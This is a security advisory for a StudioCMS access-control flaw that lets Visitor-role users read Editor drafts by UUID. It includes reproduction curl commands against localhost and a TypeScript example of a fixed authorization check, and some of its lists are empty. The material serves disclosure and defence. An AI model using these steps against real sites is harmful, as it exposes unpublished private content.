CVE-2026-24134 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
StudioCMS contains a Broken Object Level Authorization (BOLA) vulnerability in the Content Management feature that allows users with the "Visitor" role to access draft content created by Editor/Admin/Owner users.
The Issue:
The endpoint /dashboard/content-management/edit?edit={UUID} validates user authentication but does NOT validate:
This allows users with "Visitor" role (lowest privilege) to access draft content created by Editor/Admin/Owner users by directly accessing the edit URL with the content UUID.
Reproduction Steps:
Step 1 - Create draft as Editor:
http://localhost:4321/dashboard/content-management
http://localhost:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148
Copy this UUID: bad87630-69a4-4cd6-bcb2-6965839dc148
Step 2 - Access draft as Visitor:
curl -X POST "http://127.0.0.1:4321/studiocms_api/auth/login" -F 'username=dummy01' -F 'password=dummy01pass$'
[Screenshot 01: Proof of Visitor permission]
[Screenshot 02: Access Editor's draft using the UUID]
curl "http://127.0.0.1:4321/dashboard/content-management/edit?edit=bad87630-69a4-4cd6-bcb2-6965839dc148" -H "Cookie: auth_session=qvawh6zv23hc2spu6xx7pzgrnn4rpd3q" -v
Result: Returns full HTML page with draft content (200 OK)
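As a defender-side illustration added here (not StudioCMS's code), the following hypothetical handler check contrasts the authentication-only pattern the advisory describes with one that also enforces object-level authorization. The role names follow the advisory; the data shapes, function names and the draft-ownership policy (author, Admin or Owner may open a draft) are assumptions.

```typescript
// Hypothetical authorization logic for an edit view such as
// /dashboard/content-management/edit?edit={UUID}.
// Illustrative only; not StudioCMS's implementation.

type Role = "visitor" | "editor" | "admin" | "owner";

interface Session { userId: string; role: Role }
interface Content { id: string; authorId: string; draft: boolean }

// Roles allowed into the content-management edit view at all (assumed policy).
const EDIT_ROLES: ReadonlySet<Role> = new Set<Role>(["editor", "admin", "owner"]);

// Pattern the advisory describes: the endpoint only checks that a session exists,
// so any authenticated user, including a Visitor, reaches the draft.
function canViewDraftVulnerable(session: Session | null, _content: Content): boolean {
  return session !== null;
}

// Hardened check: authentication, then role, then object-level ownership.
function canViewDraftFixed(session: Session | null, content: Content): boolean {
  if (session === null) return false;               // not authenticated
  if (!EDIT_ROLES.has(session.role)) return false;  // Visitors never reach the edit view
  if (!content.draft) return true;                  // published content is not the issue here
  // Drafts: the author, or an Admin/Owner, may open them (assumed policy).
  return (
    content.authorId === session.userId ||
    session.role === "admin" ||
    session.role === "owner"
  );
}

// Constructed sample data, not taken from the advisory's reproduction.
const sampleDraft: Content = {
  id: "00000000-0000-4000-8000-000000000001",
  authorId: "editor-1",
  draft: true,
};
const visitorSession: Session = { userId: "visitor-1", role: "visitor" };
const editorSession: Session = { userId: "editor-1", role: "editor" };

// The advisory's case: a Visitor requesting an Editor's draft.
function demo(): { vulnerable: boolean; fixed: boolean } {
  return {
    vulnerable: canViewDraftVulnerable(visitorSession, sampleDraft), // true: leaks
    fixed: canViewDraftFixed(visitorSession, sampleDraft),           // false: denied
  };
}
```

A real fix also needs the check to run before any draft data is fetched and rendered, and to return the same response for "not found" and "not authorized" so the UUID cannot be used to probe for existing drafts.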
Impact Scenarios:
Information Disclosure:
Privacy Violation:
Business Impact:
Complete RBAC Bypass: